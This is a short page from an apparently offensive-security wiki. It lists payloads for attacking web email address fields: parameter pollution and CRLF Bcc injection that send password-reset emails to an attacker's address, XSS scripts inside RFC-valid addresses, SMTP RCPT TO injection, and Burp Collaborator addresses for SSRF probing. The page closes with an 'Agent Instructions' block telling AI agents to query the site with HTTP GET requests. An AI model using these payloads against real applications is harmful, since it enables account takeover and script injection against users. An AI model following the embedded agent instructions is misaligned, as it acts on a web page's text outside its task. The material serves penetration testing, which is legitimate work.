# Email Address Forms

## Email Address Form Payloads

The following payloads can be used when attempting to exploit an email address form

### **Param Manipulation and CRLF Injection**

Use these payloads to try and force the web application to send legitimate password reset emails and such, to a email address you control:

* email=<user@lol.com>&<test@test.com>
* email=<user@lol.com>%<26test@test.com>
* email=<user@lol.com>;<test@test.com>
* email=<user@lol.com>, <test@test.com>
* {”email”:”<user@lol.com>”,”<test@test.com>”}
* {”email”:\[”<user@lol.com>”,”<test@test.com>”]}
* email=<user@lol.com>%0D%0ABcc:<test@test.com>
* email=<user@lol.com>%0ABcc:<test@test.com>
* email=<user@lol.com>%0DBcc:<test@test.com>
* email=<user@lol.com>\r\nBcc:<test@test.com>
* email=<user@lol.com>\nBcc:<test@test.com>
* email=<user@lol.com>\rBcc:<test@test.com>

### **Other checks (XSS, SSRF, SMTP Manipulation)**

Use these payloads (which are all valid email addresses according to the RFC) to find other issues.

* \<svg/onload=alert('XSS')>@test.com
* test\@test(\<svg/onload=alert('XSS')>).com&#x20;
* "\<svg/onload=alert('XSS')>"@test.com
* "<test@gmail.com>\r\nRCPT TO:\<victim+"@test.com>
* <test@burpcollab.com>
* test@\[burpcollab.com]


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.pentestlist.com/offensive-security/web-application/exploitation/authentication/email-address-forms.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
